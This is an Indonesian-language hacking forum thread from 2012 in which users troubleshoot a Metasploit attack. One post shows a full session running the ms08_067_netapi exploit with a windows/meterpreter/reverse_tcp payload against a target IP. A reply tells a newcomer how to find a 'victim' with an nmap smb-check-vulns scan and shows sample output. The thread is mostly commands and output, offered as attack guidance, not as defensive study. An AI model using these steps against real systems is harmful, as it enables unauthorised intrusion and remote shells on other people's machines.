02-01-2012, 02:16 PM
(01-31-2012, 08:26 AM)one Wrote: kok punya ane gini terus ya bro
<code>
msf exploit(ms08_067_netapi) > set LHOST 172.16.21.190
LHOST => 172.16.21.190
msf exploit(ms08_067_netapi) > set RHOST 172.16.21.141
RHOST => 172.16.21.141
msf exploit(ms08_067_netapi) > set payload windows/meterpreter/reverse_tcp
payload => windows/meterpreter/reverse_tcp
msf exploit(ms08_067_netapi) > exploit
[*] Started reverse handler on 172.16.21.190:4444
[*] Automatically detecting the target...
[*] Fingerprint: Windows 7 Ultimate - (Build 7600) - lang:Unknown
[*] We could not detect the language pack, defaulting to English
[-] Exploit exception: No matching target
[*] Exploit completed, but no session was created.
</code>
coba di ping ip 172.16.21.141 bisa ga? klo firewall windowsnya nyala ga bisa bro, soalnya exploitnya udh lama itu, ms08_67_netapi == tahun 2008
(02-01-2012, 01:35 PM)radityanoor Wrote: Cara liat IP victimnya gimana ya om? maklum pengguna baru
ya di nmap dulu dong, pake script smb-check-vulns.nse
Code:
nmap --script=smb-check-vulns "ip address"
klo hasilnya seperti ini seharusnya bisa diexploitasi:
Quote:Nmap scan report for 192.168.10.207
Host is up (0.000010s latency).
Not shown: 997 closed ports
PORT STATE SERVICE
53/tcp open domain
139/tcp open netbios-ssn
445/tcp open microsoft-ds
Host script results:
| smb-check-vulns:
| Conficker: UNKNOWN; not Windows, or Windows with disabled browser service (CLEAN); or Windows with crashed browser service (possibly INFECTED).
| | If you know the remote system is Windows, try rebooting it and scanning
| |_ again. (Error NT_STATUS_OBJECT_NAME_NOT_FOUND)
| regsvc DoS: CHECK DISABLED (add '--script-args=unsafe=1' to run)
| SMBv2 DoS (CVE-2009-3103): CHECK DISABLED (add '--script-args=unsafe=1' to run)
| MS06-025: CHECK DISABLED (remove 'safe=1' argument to run)
|_ MS07-029: CHECK DISABLED (remove 'safe=1' argument to run)
I'm @ikonspirasi - Facebook
Personal blog: http://ikonspirasi.net
Personal blog: http://ikonspirasi.net